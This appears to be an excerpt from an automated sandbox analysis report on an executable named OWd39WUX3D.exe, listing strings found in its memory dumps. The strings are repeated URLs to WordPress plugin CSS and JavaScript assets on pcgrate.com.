              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver=5
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.3.
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/email-subscribers/lite/public/css/email-subscribers-public
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/email-subscribers/lite/public/js/email-subscribers-public.
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/feedback-modal-for-website/assets/css/fm-public.css?ver=1.
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/feedback-modal-for-website/assets/icons/line-awesome/css/l
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/feedback-modal-for-website/assets/js/fm-public.js?ver=1.0.
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/css/frontend.min.css?ver=3.3.1
